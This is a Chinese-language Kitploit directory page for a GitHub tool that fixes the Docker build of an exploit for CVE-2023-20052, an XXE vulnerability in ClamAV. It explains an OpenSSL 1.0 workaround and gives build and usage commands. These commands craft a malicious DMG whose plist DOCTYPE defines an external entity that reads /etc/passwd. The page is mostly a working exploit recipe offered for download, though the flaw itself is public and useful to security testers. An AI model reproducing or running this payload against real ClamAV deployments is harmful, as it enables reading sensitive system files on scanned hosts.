Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-20052 — 修复了CVE-2023-20052 ClamAV XXE漏洞利用的Docker构建。使用Ubuntu 18.04配合OpenSSL 1.0解决OpenSSL 3.0编译错误,确保libdmg-hfsplus兼容性。生成用于XML外部实体注入的恶意DMG文件。 | Kitploit
工具/GitHubGitHub/mohitsinghpapola/cve-2023-20052
漏洞分析漏洞利用Web应用程序漏洞利用模糊测试恶意软件分析二进制分析
GitHubmohitsinghpapola/cve-2023-20052

CVE-2023-20052

修复了CVE-2023-20052 ClamAV XXE漏洞利用的Docker构建。使用Ubuntu 18.04配合OpenSSL 1.0解决OpenSSL 3.0编译错误,确保libdmg-hfsplus兼容性。生成用于XML外部实体注入的恶意DMG文件。

查看仓库
146个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-20052 利用程序 - 修复构建

为 CVE-2023-20052(ClamAV XXE 漏洞)修复的 Docker 构建版本,实际可编译。

之前的缺陷

原始利用程序在现代系统上构建失败:

  • ❌ OpenSSL 3.0 兼容性错误
  • ❌ HMAC_CTX 结构体不完整类型错误
  • ❌ 隐式函数声明错误
  • ❌ 构建在 dmg/filevault.c 编译阶段失败

我所修复的内容

  1. 更改基础镜像:Ubuntu 22.04 → Ubuntu 18.04
  2. 修复 OpenSSL 版本:使用 libssl1.0-dev(OpenSSL 1.0)
  3. 添加非交互模式:阻止构建时出现提示
  4. 可工作的 Dockerfile:实际编译成功

为何此方案有效

libdmg-hfsplus 使用了已废弃的 OpenSSL 1.0 函数:

  • HMAC_CTX_init() / HMAC_CTX_cleanup()(在 OpenSSL 1.1+ 中移除)
  • 直接使用 HMAC_CTX 结构体(在 OpenSSL 1.1+ 中为不透明类型)
  • Ubuntu 18.04 是最后一个支持 OpenSSL 1.0 的 LTS 版本。

    构建与使用

    root@kitploit:~
    # 构建(耗时约 3-5 分钟)
    docker build -t cve-2023-20052 .
    
    # 运行
    docker run -v $(pwd):/exploit -it cve-2023-20052 bash
    
    # 创建利用 DMG
    genisoimage -D -V "exploit" -no-pad -r -apple -o test.img .
    dmg dmg test.img test.dmg
    bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>|' -e 's/blkx/&xxe;/' test.dmg -o exploit.dmg
    

    致谢

    • 原始利用程序:nokn0wthing/CVE-2023-20052
    • 修复者:https://reapsec.com
    root@kitploit:~
    ## 针对 CVE-2023-20052 (ClamAV XXE) 修复的 Docker 构建 - 解决 OpenSSL 3.0 编译错误。使用 Ubuntu 18.04 及 OpenSSL 1.0 以兼容 libdmg-hfsplus
    
    下载工具